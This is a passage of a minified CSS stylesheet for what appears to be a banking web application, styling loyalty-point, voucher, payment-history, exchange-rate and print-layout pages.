3);border-radius:8px}}.vch-box__img::after{content:'';display:block;padding-bottom:62%}.vch-box__img>img{position:absolute;object-fit:cover;width:100%}.vch-box__info{font-size:16px;font-weight:500;line-height:24px;margin-left:24px}.vch-box.small .vch-box__info{margin-left:16px}@media screen and (max-width: 767px){.vch-box__info{font-size:14px;font-weight:500;line-height:20px;margin-left:0 !important;margin-top:8px}}.vch-box__info__name{display:-webkit-box;-webkit-line-clamp:2;-webkit-box-orient:vertical;overflow:hidden}.vch-box__info__note{color:#9EB3C9}.vch-box__info__point{display:flex;flex-direction:row}@media screen and (max-width: 1023px){.vch-box__info__point{flex-direction:column}}.vch-box__info__point .point{flex-shrink:0}.vch-box__info__pool{margin-left:32px;font-size:16px;font-weight:500;line-height:24px;color:#9EB3C9;position:relative}@media screen and (max-width: 1023px){.vch-box__info__pool{margin-left:0;margin-top:8px}}.vch-box__info__pool::before{content:'';position:absolute;top:50%;left:-16px;height:80%;width:1px;background-color:#C9D9EA;transform:translateY(-50%)}@media screen and (max-width: 1023px){.vch-box__info__pool::before{content:none}}.vch-box.small .vch-box__img{flex-basis:120px;height:72px}@media screen and (max-width: 767px){.vch-box.small .vch-box__img{flex-basis:100%}}.vch-tbox{width:100%;padding:24px 16px;background-color:#fff;box-shadow:0px 8px 30px rgba(0,73,121,0.06);border-radius:10px}.vch-tbox__point{font-size:18px;font-weight:500;line-height:24px;color:#41A43A}.vch-tbox__pool{font-size:16px;font-weight:400;line-height:24px;color:#8294A2;margin-bottom:8px}.vch-tbox__name{height:48px;margin-top:8px;font-size:18px;font-weight:500;line-height:24px;display:-webkit-box;-webkit-line-clamp:2;-webkit-box-orient:vertical;overflow:hidden}.vch-tbox__date{margin-top:16px;font-size:14px;font-weight:normal;line-height:20px;color:#338DC0}.vch-tbox__quantity{margin-top:8px}.vch-tbox__manual{color:#338DC0;text-decoration:underline}.vch-types .hot{background-color:#fff;border-radius:4px;display:inline-block;height:24px;width:24px;line-height:24px;text-align:center}.vch-types .hot img{display:initial;width:16px;height:16px}.vch-types .new{cursor:default;font-size:12px;font-weight:500;line-height:24px;padding:0 8px;color:#fff;background-color:#4CB944;border-radius:4px;display:inline-block}.loyalty-point-mgmt{background-color:#fff;box-shadow:0px 8px 10px rgba(32,71,101,0.05);border-radius:10px}.loyalty-point-mgmt__banner{height:176px;display:flex;flex-direction:column;justify-content:center;align-items:center;position:relative;background-color:white;background-image:url("/static/image/background/loyalty-banner.svg");background-repeat:no-repeat;background-size:cover;background-position:center;border-bottom:3px solid #79CCF3;border-top-left-radius:10px;border-top-right-radius:10px}@media screen and (max-width: 767px){.loyalty-point-mgmt__banner{height:256px}}.loyalty-point-mgmt__banner__point{font-size:40px;font-weight:600;line-height:52px;color:#005993;padding:0 16px;word-break:break-all;text-align:center}.loyalty-point-mgmt__banner__note{position:absolute;left:0;bottom:16px;width:100%;padding:0 32px;font-size:14px;font-weight:500;line-height:20px;color:#9EB3C9}@media screen and (max-width: 767px){.loyalty-point-mgmt__banner__note{padding:0 16px}}.loyalty-point-mgmt__banner__note>:first-child{margin-right:16px}.loyalty-point-mgmt__banner__gift-box{margin:8px 0;border:1px solid #005993;background-color:white;border-radius:4px;font-size:14px;font-weight:500;line-height:20px}@media screen and (min-width: 768px){.loyalty-point-mgmt__banner__gift-box{position:absolute;right:32px;top:24px}}.loyalty-point-mgmt__body{padding:0 32px 32px 32px}@media screen and (max-width: 767px){.loyalty-point-mgmt__body{padding:0 12px 32px 16px}}.loyalty-point-mgmt .account-loyalty__accordion__summary{font-size:20px;font-weight:600;line-height:32px;margin-bottom:16px}.loyalty-point-mgmt .account-loyalty .accordion__item .tic .ic{transition:transform .2s}.loyalty-point-mgmt .account-loyalty .accordion__item.open .tic .ic{transform:rotate(90deg)}.loyalty-point-mgmt .loy-transactions__filter{margin-top:40px}@media screen and (max-width: 767px){.loyalty-point-mgmt .loy-transactions__filter{flex-direction:column}}.loyalty-point-mgmt .loy-transactions__filter__date{position:relative;max-width:452px;min-width:280px;padding-right:32px;margin-top:8px;flex-basis:50%}@media screen and (max-width: 767px){.loyalty-point-mgmt .loy-transactions__filter__date{width:100%;max-width:none;padding-right:0;min-width:100%}}.loyalty-point-mgmt .loy-transactions__filter__btn{margin-top:8px;flex-basis:20%}@media screen and (max-width: 767px){.loyalty-point-mgmt .loy-transactions__filter__btn{margin-top:8px;width:100%}.loyalty-point-mgmt .loy-transactions__filter__btn button{width:100%}}.loyalty-point-mgmt .loy-transactions__filter__type{margin-top:8px;position:relative;max-width:260px;padding-right:32px;flex-grow:2;min-width:200px;flex-basis:30%}@media screen and (max-width: 767px){.loyalty-point-mgmt .loy-transactions__filter__type{width:100%;max-width:none;margin-top:32px;padding-right:0;min-width:100%}}.loyalty-point-mgmt .loy-transactions__filter__label{font-size:14px;font-weight:500;line-height:20px;position:absolute;left:0;bottom:calc(100% + 4px)}@media screen and (max-width: 1023px){.loyalty-point-mgmt .loy-transactions__table{display:none}}.loyalty-point-mgmt .loy-transactions__table--mobile{display:none}@media screen and (max-width: 1023px){.loyalty-point-mgmt .loy-transactions__table--mobile{display:block}.loyalty-point-mgmt .loy-transactions__table--mobile__sort{margin:8px 0}}.loy-cart__vouchers{border-bottom:1px solid #C9D9EA;overflow-x:auto}@media screen and (min-width: 768px){.loy-cart__vouchers{padding:8px 0}}.loy-cart__table__head{margin-top:24px;display:flex;flex-direction:row;justify-content:space-between;align-items:center;border-bottom:1px solid #C9D9EA;padding-bottom:16px}@media screen and (max-width: 767px){.loy-cart__table__head{align-items:flex-end;margin-top:16px}.loy-cart__table__head .sum{display:flex;flex-direction:column;align-items:flex-end;transform:translateY(3px)}}.loy-cart__voucher__check{width:16px;margin:auto 16px auto 0;cursor:pointer}.loy-cart__confirm__pools{font-size:16px;font-weight:500;line-height:24px;padding:24px 0;border-bottom:1px solid #C9D9EA}.loy-cart__confirm__pools .pool{line-height:30px;display:flex;flex-direction:row;justify-content:flex-end}.loy-cart__confirm__pools .pool span:nth-of-type(1){margin-right:16px}.loy-cart__confirm__pools .pool span:nth-of-type(2){color:#EA114E;flex-shrink:0}.loy-point{font-size:20px;font-weight:600;line-height:30px;color:#EA114E}.loy-point-s{font-size:18px;font-weight:500;line-height:24px;color:#EA114E}.loy-vch{padding:24px}@media screen and (max-width: 1023px){.loy-vch{padding:24px 16px}}@media screen and (max-width: 767px){.loy-vch__info{flex-wrap:wrap}}.loy-vch__info__img{position:relative;padding-bottom:62%;background-color:#E7EEF3}@media screen and (max-width: 767px){.loy-vch__info__img{flex-basis:100%}}.loy-vch__info__img>img{position:absolute;width:100%;object-fit:cover}.loy-vch__info__img__wrap{position:relative;flex-basis:calc(100% / 3);max-width:360px;min-width:220px;border-radius:8px;overflow:hidden;margin-right:24px;height:fit-content}@media screen and (max-width: 767px){.loy-vch__info__img__wrap{flex-basis:100%;max-width:100%;margin-right:0}}.loy-vch__info__action{flex-basis:calc(200% / 3);flex-grow:1}@media screen and (max-width: 767px){.loy-vch__info__action{flex-basis:100%}}.loy-vch__main-info__label{font-size:20px;font-weight:600;line-height:30px;color:#062A46}.loy-vch__main-info__pool{margin-top:8px;font-size:16px;font-weight:500;line-height:24px;color:#9EB3C9}.loy-vch__main-info__point{margin-top:8px;font-size:28px;font-weight:600;line-height:40px;color:#EA114E}@media screen and (max-width: 767px){.loy-vch__main-info{margin-top:16px}}.loy-vch__order{margin-top:16px;padding:16px 0 24px;border-top:1px solid #C9D9EA;border-bottom:1px solid #C9D9EA;display:flex;align-items:center;flex-wrap:wrap}.loy-vch__order>span{margin-top:8px}.loy-vch__btn{margin-top:24px;flex-wrap:wrap;display:flex}@media screen and (max-width: 767px){.loy-vch__btn{margin:24px -4px 0 -4px}}.loy-vch__btn button{margin:0 4px 8px 4px}@media screen and (max-width: 767px){.loy-vch__btn a{width:100%}.loy-vch__btn button{width:100%;margin:0 0px 8px 0px}}.loy-faqs{min-height:480px;padding:24px}@media screen and (max-width: 767px){.loy-faqs{padding:24px 12px 24px 16px}}.loy-faqs .accordion__item{text-align:justify}.loy-faqs .accordion__item .arrow-right{margin-left:8px;transition:transform .2s}.loy-faqs .accordion__item.open .arrow-right{transform:rotate(90deg)}.loy-faqs .accordion__details{margin:0 32px 0 20px}@media screen and (max-width: 767px){.loy-faqs .accordion__details{margin:0 32px 0 0}}.loy-terms-and-conditions{min-height:480px;padding:24px}@media screen and (max-width: 767px){.loy-terms-and-conditions{padding:24px 12px 24px 16px}}.loy-terms-and-conditions__media{position:relative;max-width:856px;margin:16px auto 0}.loy-terms-and-conditions__media__content{border-radius:10px;overflow:hidden;padding-top:56%;width:100%}.loy-terms-and-conditions__media__content>img{width:100%}.loy-terms-and-conditions__media__content video{display:block;width:100%;height:100%;outline:none;position:absolute;top:0;left:0;border-radius:10px}.loy-terms-and-conditions__media__play{position:absolute;z-index:2;width:100%;height:100%;display:flex;justify-content:center;align-items:center;top:0;left:0;border-radius:10px;background-color:#00000047;background-size:cover;background-position:center;background-repeat:no-repeat}.loy-terms-and-conditions__media__play .play-button{width:96px;height:96px;border-radius:50%;background-color:#fff;display:flex;align-items:center;justify-content:center;box-shadow:0px 0px 20px rgba(250,155,185,0.2);cursor:pointer}.loy-terms-and-conditions__media__play .play-button::before{content:'';width:0;height:0;transform:translateX(5px);border-top:20px solid transparent;border-bottom:20px solid transparent;border-left:30px solid #EA114E}.loy-terms-and-conditions__link{text-decoration:underline;width:fit-content}.loy-terms-and-conditions__link:active,.loy-terms-and-conditions__link:hover{text-decoration:underline}.loyalty{padding:16px 64px 64px 64px;transition:padding .3s;font-size:16px;font-weight:400;line-height:24px}@media screen and (max-width: 1279px){.loyalty{padding:16px 16px 64px 16px}}.loyalty__step{display:none}@media screen and (max-width: 1023px){.loyalty__step{display:block;margin-bottom:16px}}.loyalty__step:empty{margin-bottom:0}.lucky-num__type .lucky-type-radio{width:100%}.lucky-num__type .lucky-type-label{color:#062A46;padding-left:8px}.lucky-num__type small{color:#005993;font-size:12px}.lucky-num__type__group-type{display:flex;justify-content:space-between}.lucky-num__type__group-type .cover-number{min-width:110px;min-height:0px;overflow:hidden;padding:8px;background:linear-gradient(90deg, #FFD12E 0%, #FFD48A 35%, #FFD12E 100%);border-radius:10px;height:fit-content}@media screen and (max-width: 1023px){.lucky-num__type__group-type .cover-number{padding:6px;min-width:94px}}.lucky-num__type__group-type .cover-number .predefine-number{font-weight:1000;border-radius:10px;color:#005993;background-color:#fff;padding:5px 5px;text-align:center}@media screen and (max-width: 1023px){.lucky-num__type__group-type .cover-number .predefine-number{padding:2px}}.lucky-num__lst .hint{font-size:14px;margin-top:4px;color:#9EB3C9}.lucky-num__lst__title{padding:32px 0 16px 0}@media screen and (max-width: 1023px){.lucky-num__lst__title{padding:32px 0 0 0}}@media screen and (max-width: 1023px){.lucky-num__lst__table{display:none}}@media screen and (min-width: 1024px){.lucky-num__lst__sort{display:none}}.lucky-num__lst__table .lucky-num-price,.lucky-num__lst .table-mobile .lucky-num-price{display:flex;flex-direction:column}.lucky-num__lst__table .lucky-num-price .top,.lucky-num__lst .table-mobile .lucky-num-price .top{font-weight:600;font-size:16px}.lucky-num__lst__table .lucky-num-price .bottom .before,.lucky-num__lst .table-mobile .lucky-num-price .bottom .before{text-decoration:line-through;font-size:12px}.lucky-num__lst__table .lucky-num-price .bottom .sale,.lucky-num__lst .table-mobile .lucky-num-price .bottom .sale{color:white;background-color:#FF5C7F;padding:1px 4px;border-radius:4px;text-transform:uppercase;font-size:10px}.lucky-num__choose-account .commitment .custom-checkbox{flex:50%;align-items:center}.lucky-num__choose-account .pkg-note{color:#1A73AB;font-size:14px}.lucky-num__choose-account .error{color:#EA114E}.lucky-num__confirm-contract .pl-text-group__title{text-transform:uppercase}.lucky-num__confirm-contract__note{padding:32px 0px 8px;font-style:italic;border-bottom:1px solid #C9D9EA;font-size:14px}.lucky-num__confirm-contract__header{display:flex;justify-content:space-between;padding:32px 8px 0px;color:#1A73AB;align-items:center}.lucky-num__confirm-contract__title{text-transform:uppercase;font-size:24px;color:#1A73AB;font-weight:600;padding:32px 8px 24px 8px}.lucky-num__confirm-contract__date{text-align:right;font-style:italic;padding-bottom:12px}.lucky-num__confirm-contract__date .num{color:#1A73AB;font-weight:bold}.lucky-num__confirm-contract__num{padding:0 8px}.lucky-num__confirm-contract__section{text-transform:uppercase;font-size:18px;font-weight:600;padding-top:8px}.lucky-num__confirm-contract__section-content{padding:0 32px}.lucky-num__confirm-contract__section-content .branch{color:#1A73AB}.lucky-num__confirm-contract__confirm-title{font-weight:bold;padding-top:24px}.lucky-num__confirm-contract .deal{font-size:14px}.lucky-num__confirm-contract .deal .pl-text-group__title{display:flex;justify-content:space-between}.lucky-num__confirm-contract .deal .btn-toggle{cursor:pointer;color:#1A73AB;text-transform:none}.input-currency{position:relative;padding:0;padding-right:16px}.input-currency input{padding-left:136px !important}.input-currency__select{position:absolute;height:100%;width:120px;border:1px solid transparent;z-index:1}.input-currency__select.open{border:1px solid #005993}.input-currency__select.open::after{content:none}.input-currency__select.open ul{display:initial}.input-currency__select::after{content:'';position:absolute;top:50%;left:100%;background-color:#C9D9EA;height:calc(100% - 16px);transform:translateY(-50%);width:1px}.input-currency__select__control{height:100%;padding:0 8px 0 16px}.input-currency__select ul{max-height:168px;display:none;margin:0;padding:0;border-right:1px solid #005993;border-bottom:1px solid #005993;border-left:1px solid #005993;background-color:#fff;overflow-y:auto;transform:translateX(-1px);position:absolute;top:100%;left:0;width:calc(100% + 2px)}.input-currency__select ul::before{content:'';position:sticky;display:block;top:0;left:0;margin:0 16px;height:1px;background-color:#C9D9EA}.input-currency__select ul li{cursor:pointer;padding:8px 16px}.input-currency__select ul li:hover{background-color:#EAF3FD}.input-currency__select ul li.selected{background-color:#DEEBFF}.table-market{width:100%}.table-market thead tr>*{padding:8px 24px;text-transform:uppercase;border-bottom:1px solid #C9D9EA}.table-market tbody td{padding:8px 24px;border-bottom:1px dashed #C9D9EA}.table-market td:first-child{text-align:left}.table-market td:not(:first-child){text-align:right}.market-information .exchange-rate__swap{margin-bottom:2px}.market-information .exchange-rate .convert-money{user-select:none}.market-information .exchange-rate .convert-money__select{padding-right:16px;border-right:1px solid #C9D9EA}.market-information .exchange-rate .convert-money input{padding-right:16px}.market-information .exchange-rate .convert-money.from input{padding-left:136px}.market-information .exchange-rate .convert-money.to input{padding-left:104px}.market-information .interest-rate__short-info{border:1px solid #C9D9EA;border-radius:10px;display:flex;flex-direction:column;background-image:url("/static/image/icon/card-saving-bg.svg");background-repeat:no-repeat;background-position:right 16px bottom;background-size:96px}.market-information .interest-rate__short-info .separate{height:1px;background-color:#C9D9EA}.market-information .interest-rate__search>*{flex-basis:calc(50% - 16px)}.page-notifications{padding:40px 64px 64px 64px}.page-notifications .page-title{color:#062A46}.page-notifications .list-notifications{padding:24px;background:#fff;border-radius:10px;-webkit-box-shadow:0px 8px 10px rgba(32,71,101,0.02);-moz-box-shadow:0px 8px 10px rgba(32,71,101,0.02);box-shadow:0px 8px 10px rgba(32,71,101,0.02)}.page-notifications .item-notification{border-bottom:1px solid #C9D9EA}.page-notifications .item-notification .banner{width:259px;height:259px;min-width:259px;border-radius:10px;background-size:cover}.page-notifications .item-notification .time{font-style:normal;font-weight:normal;font-size:16px;line-height:24px;color:#9EB3C9;position:relative}.suggest-quantity-wrapper{display:grid;grid-template-columns:auto auto auto;grid-gap:10px;margin-top:10px}.suggest-quantity-wrapper__suggestion{width:100%;padding:5px;text-align:center;background-color:#fff;color:#005993;cursor:pointer;border:1px solid #C9D9EA}@media screen and (max-width: 1023px){.suggest-quantity-wrapper{grid-template-columns:auto auto}}.orderBond-internal__otp-form{color:#005993}.orderBond-internal__otp-form>*{margin-top:24px;white-space:pre-wrap}.payment-creditcard__content__form{padding:32px}.payment-creditcard__content__form .group-amount__item{display:flex;flex-direction:row;align-items:center;margin-top:24px}.payment-creditcard__content__form .group-amount__item.spec{align-items:flex-start}.payment-creditcard__content__form .group-amount__item.spec .custom-radio{line-height:48px}.payment-creditcard__content__form .group-amount__item .custom-radio{margin-right:16px}.payment-creditcard__content__form .group-amount__item .custom-radio .label-radio{margin-left:16px}.payment-creditcard__content__form .group-amount__item:first-child{margin-top:0}.payment-creditcard__content__form .group-amount__item .input-money{flex:1}.payment-creditcard__content__form .group-amount__item .input-money__input{margin:0}.payment-creditcard__content__otp{padding:32px}.payment-creditcard__content__otp .otp-type>*{margin-right:16px}.payment-creditcard__content__otp .otp-type>*:nth-last-child(1){margin-right:0}.payment-creditcard__content__otp .m-top{margin-top:24px}.payment-creditcard__content__otp .details-from__balance{display:flex;flex-direction:row;align-items:center;justify-content:space-between;padding-top:8px;margin-top:16px;border-top:1px solid #005993;font-size:14px;font-weight:400;line-height:20px}.payment-creditcard__content__otp .otp-sent{color:#005993}.payment-creditcard__content__success__head-info .head-info__bank{display:flex;flex-direction:row;align-items:flex-start;justify-content:space-between;padding:24px}.payment-creditcard__content__success__head-info .head-info__bank__contact--phone{color:#005993}.payment-creditcard__content__success__head-info .head-info__transaction{display:flex;flex-direction:row;justify-content:space-between;align-items:flex-start;padding:24px;padding-top:0}.payment-creditcard__content__success__head-info .head-info__transaction--message-success{color:#41A43A}.payment-creditcard__content__success__head-info .head-info__transaction__wrap-qrcode{position:relative}.payment-creditcard__content__success__head-info .head-info__transaction__wrap-qrcode--qrcode{position:absolute;top:0;right:0;z-index:1}.payment-creditcard__content__success .details{padding:0 24px;background-size:contain;background-position:center;background-repeat:no-repeat;background-image:url("/static/image/logo/logonotext-transparent.png");background-size:300px;background-color:#F4F8FB}.payment-creditcard__content__success .details__hint{margin-top:64px;padding-bottom:16px;color:#9EB3C9}.payment-creditcard__content__success .details .app-list .negative-value{color:#EE2E63}.payment-creditcard__content__success .footer{padding:24px;padding-top:0}.payment-bond-history__info{display:flex;align-items:center;color:#062A46;justify-content:space-between;flex-wrap:wrap;margin-top:16px}@media screen and (max-width: 1023px){.payment-bond-history__info{margin-top:4px;display:block;font-size:14px;font-weight:400;line-height:22px}.payment-bond-history__info__btn-detail{margin-top:24px;display:flex;justify-content:space-between;font-size:16px;font-weight:500;line-height:24px}}.payment-bond-history__info__balance>.history-info-label{color:#C9D9EA}.payment-bond-history__info__balance>.btn-detail-history-info{cursor:pointer;color:#005993}.payment-bond-history__info__balance:not(:last-child){margin-right:48px}.payment-bond-history__info__balance:nth-child(2){flex-grow:1}@media screen and (max-width: 1023px){.payment-bond-history__info__balance{margin-top:4px;display:flex;justify-content:space-between;flex-wrap:wrap}.payment-bond-history__info__balance:not(:last-child){margin-right:0}}.payment-bond-history__detail-info{margin-top:24px}.payment-bond-history__detail-info .box-info .detail-list-item{display:flex;flex-direction:row;color:#062A46;font-size:14px;font-weight:400;line-height:20px;padding-bottom:24px;margin-bottom:24px;border-bottom:1px dashed #C9D9EA}.payment-bond-history__detail-info .box-info .detail-list-item .column-item{width:50%}.payment-bond-history__detail-info .box-info .detail-list-item .column-separate{background-color:#E7EEF3;margin:0 40px;flex-basis:1px;min-width:1px}.payment-bond-history__detail-info .box-info .detail-list-item .account-status.active{color:#4CB944}.payment-bond-history__detail-info .box-info .detail-list-item:nth-last-child(1){padding-bottom:0;margin-bottom:0;border-bottom:none}.payment-bond-history__detail-info .box-info .detail-list-item>.column-item td{padding:4px;padding-left:12px;vertical-align:text-top}.payment-bond-history__detail-info .box-info .detail-list-item>.column-item td.item-label{padding-right:24px;max-width:228px}.payment-bond-history__detail-info .box-info .detail-list-item>.column-item td.item-label .wrap{position:relative}.payment-bond-history__detail-info .box-info .detail-list-item>.column-item td.item-label .dot{width:4px;height:4px;display:inline-block;background:#005993;border-radius:100%;margin-right:8px;position:absolute;left:-12px;top:4px}@media screen and (max-width: 1023px){.payment-bond-history__detail-info .box-info .detail-list-item{flex-direction:column}.payment-bond-history__detail-info .box-info .detail-list-item .column-separate{display:none}.payment-bond-history__detail-info .box-info .detail-list-item .column-item{width:100%}.payment-bond-history__detail-info .box-info .detail-list-item .column-item table{width:100%}.payment-bond-history__detail-info .box-info .detail-list-item .column-item table .item-label{width:50%;padding-right:4px}.payment-bond-history__detail-info .box-info .detail-list-item .column-item table .item-value{width:50%;padding-left:4px;text-align:right}}.payment-bond-history__detail-info__title{display:flex;flex-flow:row;margin-bottom:16px}.payment-bond-history__detail-info__title--label{font-size:14px;font-weight:500;line-height:18px}.payment-bond-history__detail-info__title--label span{margin-right:10px}.payment-bond-history__detail-info__title--label img{cursor:pointer}.payment-bond-history{padding:32px;display:flex;flex-flow:column}@media screen and (max-width: 1023px){.payment-bond-history{padding:32px 16px}}.payment-bond-history__action{display:flex;align-items:center}.payment-bond-history__action>*{text-align:left}@media screen and (max-width: 1023px){.payment-bond-history__action{flex-basis:100%;flex-wrap:wrap;justify-content:flex-start}}.payment-bond-history__filter{margin-top:24px;background-color:#fff;box-shadow:0px 8px 10px rgba(32,71,101,0.02);border-radius:10px;padding:30px 32px}@media screen and (max-width: 1023px){.payment-bond-history__filter{padding:30px 16px;display:flex;flex-direction:column}}.payment-bond-history__filter .toggle-filter-detail{margin-left:16px}@media screen and (max-width: 1023px){.payment-bond-history__filter .toggle-filter-detail{display:none}}.payment-bond-history__filter .toggle-filter-detail button{min-width:160px}.payment-bond-history__filter .toggle-filter-detail--mobile{order:99;display:none}@media screen and (max-width: 1023px){.payment-bond-history__filter .toggle-filter-detail--mobile{display:block}}.payment-bond-history__filter .toggle-filter-detail--mobile button{width:100%}.payment-bond-history__filter .toggle-filter-detail--mobile .filter-actions{transform:translateY(-10px);background-color:#F4F8FB;padding:16px;border-radius:10px}.payment-bond-history__filter__select{flex:1 1 auto}@media screen and (min-width: 1024px){.payment-bond-history__filter__select>div{max-width:600px}}.payment-bond-history__filter--btnFilter{display:flex;justify-content:flex-end;align-items:center}@media screen and (max-width: 1023px){.payment-bond-history__table{display:none}}@media screen and (min-width: 1024px){.payment-bond-history__sort{display:none}}.payment-bond-history__modal-transaction .modal-transaction-main,.payment-bond-history__modal-list .modal-transaction-main{background-image:url("/static/image/logo/logonotext-transparent.png");background-repeat:no-repeat;background-size:contain;background-color:#F4F8FB;background-position:center;background-size:300px;padding:0px 32px}.payment-bond-history__modal-transaction .modal-transaction-note,.payment-bond-history__modal-list .modal-transaction-note{display:block;font-size:12px;line-height:20px;padding:16px 0px;color:#9EB3C9}.payment-bond-history__modal-transaction .modal-transaction-title,.payment-bond-history__modal-list .modal-transaction-title{position:relative;padding:0px 32px}.payment-bond-history__modal-transaction .modal-transaction-title--label,.payment-bond-history__modal-list .modal-transaction-title--label{font-size:18px;line-height:24px;margin-bottom:8px;color:#4CB944;font-weight:500}.payment-bond-history__modal-transaction .modal-transaction-title--date,.payment-bond-history__modal-list .modal-transaction-title--date{font-size:14px;line-height:20px;margin-bottom:16px;color:#062A46}.payment-bond-history__modal-transaction .container-qr,.payment-bond-history__modal-list .container-qr{width:120px;height:120px;position:absolute;top:0;right:0}.payment-bond-history__modal-list{width:930px}.payment-bond-history__modal-list .modal-transaction-note{display:block;font-size:12px;line-height:20px;padding:16px 46px 32px 46px;color:#9EB3C9}.group-filter-fast{display:flex;justify-content:flex-start;align-items:center}@media screen and (max-width: 1023px){.group-filter-fast{margin:0 -8px}}@media screen and (max-width: 767px){.group-filter-fast{margin:0;flex-wrap:wrap}}.group-filter-fast .filter-fast-card{flex:1;height:48px;border:1px solid #C9D9EA;background-color:#fff;display:flex;align-items:center;justify-content:center;color:#062A46;font-size:14px}@media screen and (min-width: 768px){.group-filter-fast .filter-fast-card:not(:last-child){margin-right:16px}}@media screen and (max-width: 1023px){.group-filter-fast .filter-fast-card{width:calc(100% / 3);margin:0 8px}}@media screen and (max-width: 767px){.group-filter-fast .filter-fast-card{flex-basis:100%;margin:4px 0}}.group-filter-fast .filter-fast-card.active{background-color:#CBE6FE;color:#005993}.pmt-his-card .filter-card{margin-top:32px;padding:32px}@media screen and (max-width: 1023px){.pmt-his-card .filter-card{padding:32px 16px}}.pmt-his-card .filter-card .filter__action{margin-top:8px;display:flex;align-items:center;justify-content:space-between}.pmt-his-card .filter-card .filter__action .select-account{flex:1}@media screen and (min-width: 1024px){.pmt-his-card .filter-card .filter__action .select-account{margin-right:16px}.pmt-his-card .filter-card .filter__action .select-account>div{max-width:600px}}.pmt-his-card .filter-card .filter-toggle{margin-top:16px;display:flex;justify-content:space-between;flex-direction:row;align-items:baseline;flex-wrap:wrap}@media screen and (max-width: 1023px){.pmt-his-card .filter-card .filter-toggle{flex-direction:column;align-items:initial;margin-top:0}.pmt-his-card .filter-card .filter-toggle .balance-horizontal{flex-direction:column}.pmt-his-card .filter-card .filter-toggle .balance-horizontal>div{margin-left:0;margin-top:8px;display:flex;justify-content:space-between}}.pmt-his-card .filter-card .filter-toggle .btn-toggle{color:#005993;cursor:pointer}.pmt-his-card .filter-card .filter-toggle .btn-toggle img{margin-left:8px}@media screen and (max-width: 1023px){.pmt-his-card .filter-card .filter-toggle .btn-toggle{display:flex;justify-content:space-between;margin-top:32px;align-items:center}}.pmt-his-card .filter-card__info{margin-top:32px}@media screen and (max-width: 1023px){.pmt-his-card .filter-card__info{margin-top:16px}}.pmt-his-card .filter-card__info .info__name{margin-top:8px}.pmt-his-card .filter-card__info .info__name>*:not(:first-child){margin-left:16px}.pmt-his-card .filter-card__info .info__account{border:1px solid #005993;box-sizing:border-box;border-radius:30px;padding:8px 16px;color:#005993;display:inline-block;margin-top:8px}.pmt-his-card .filter-card__info .info__more{margin-top:16px}.pmt-his-card .filter-card__info .info__more .info__more__item{display:flex}.pmt-his-card .filter-card__info .info__more .info__more__item .item-label{flex-basis:120px;word-break:break-word}@media screen and (max-width: 1023px){.pmt-his-card .filter-card .toggle-filter-detail{display:none}}.pmt-his-card .filter-card .toggle-filter-detail--mobile{order:99;display:none}@media screen and (max-width: 1023px){.pmt-his-card .filter-card .toggle-filter-detail--mobile{display:block}}.pmt-his-card .filter-card .toggle-filter-detail--mobile button{width:100%}.pmt-his-card .filter-card .toggle-filter-detail--mobile .filter-actions{transform:translateY(-10px);background-color:#F4F8FB;padding:16px;border-radius:10px}.pmt-his-card .filter-card .toggle-filter-detail--mobile .btn-search{margin-top:32px}@media screen and (min-width: 1024px){.pmt-his-card .btn-card-action{margin-left:auto;margin-top:16px}}@media screen and (max-width: 1023px){.pmt-his-card .btn-card-action{order:-1;width:100%;margin-bottom:16px}}.card-list-info .card-list-info__item{display:flex}@media screen and (max-width: 1023px){.card-list-info .card-list-info__item{justify-content:space-between}}.card-list-info .card-list-info__item:not(:first-child){margin-top:8px}.card-list-info .card-list-info__item .value{text-align:right}.card-list-info .card-list-info__item .label{flex:0 0 96px;margin-right:8px;padding-left:12px;position:relative}.card-list-info .card-list-info__item .label::before{content:'';width:4px;height:4px;display:inline-block;background:#005993;border-radius:100%;position:absolute;left:0;top:6px}@media screen and (max-width: 1023px){.card-list-info{flex-basis:100%}}.filter-card-form{width:100%;padding:24px;border-radius:10px;margin-top:22px;background-color:#F4F8FB;position:relative;padding-right:56px}.filter-card-form .btn-close{position:absolute;top:16px;right:16px}@media screen and (max-width: 1023px){.filter-card-form{padding:24px 16px}.filter-card-form .btn-close{display:none}}.filter-box{margin:-8px;display:flex;flex-wrap:wrap}.filter-box__item{margin:8px;flex-basis:calc(50% - 16px)}@media screen and (max-width: 1023px){.filter-box__item{flex-basis:calc(100% - 16px)}}.trx-type.D{color:#EA114E}.trx-type.C{color:#005993}.list-statement{padding:32px 24px;min-width:400px}.list-statement__head{display:flex;justify-content:space-between;align-items:center}.list-statement__head img{margin-left:32px;cursor:pointer}.list-statement__item{margin-top:16px;display:block;color:#062A46;cursor:pointer}.list-statement__item img{margin-right:8px}.list-statement__item:hover{color:#005993}.modal-trxCard-details__title{color:#062A46}.modal-trxCard-details .modal-trxCard-details__button-group button{min-width:auto}@media screen and (max-width: 1023px){.pmt-his-table{display:none}}.pmt-his-table__amount{text-align:right}@media screen and (min-width: 1024px){.pmt-his__sort{display:none}}.pmt-his-card .pmt-his-list{padding:32px}@media screen and (max-width: 1023px){.pmt-his-card .pmt-his-list{padding:32px 16px}}.pmt-his-card .pmt-his-list .list-head{display:flex;justify-content:space-between;align-items:center;margin-bottom:8px}@media screen and (max-width: 1023px){.pmt-his-card .pmt-his-list .list-head{flex-direction:column;align-items:flex-start}.pmt-his-card .pmt-his-list .list-head .button-group{flex-wrap:wrap;margin-top:8px}.pmt-his-card .pmt-his-list .list-head button{padding:8px 0;margin-right:32px;margin-left:0;text-align:left}.pmt-his-card .pmt-his-list .list-head .save-action-wrap{margin-left:0;flex-wrap:wrap}}.group-download{position:relative}.group-download__menu{width:100%;background-color:#fff;position:absolute;display:flex;flex-flow:column;padding:8px 0px;box-shadow:0px 8px 15px rgba(124,158,177,0.1);border-radius:8px;font-size:12px}.group-download__menu span:first-child{border-bottom:1px solid #E7EEF3}.group-download__menu span{padding:8px 21px;cursor:pointer;color:#062A46}.print-layout{background-image:url("/static/image/background/watermark-a4.png");background-position:top center;background-repeat:repeat-y;background-size:calc(210mm - 96px) calc(297mm - 96px);background-color:#F4F8FB}.print-layout tr{background-color:transparent !important;page-break-inside:avoid;page-break-after:auto}.print-layout tr:not(:last-child){border-bottom:1px solid #E7EEF3}.print-layout thead{border-bottom:1px solid #E7EEF3}.print-layout__header{background-color:white}.print-layout__header__label{font-size:20px;font-weight:600;line-height:30px;color:#062A46}.print-layout__header__date{font-size:14px;font-weight:400;line-height:20px;color:#9EB3C9}@media print{body,html{width:calc(210mm - 96px);height:auto;margin:auto}@page{margin:48px !important}}.payment-history-credit-filter{width:100%;padding:24px;border-radius:10px;margin-top:22px;background-color:#F4F8FB;position:relative}@media screen and (max-width: 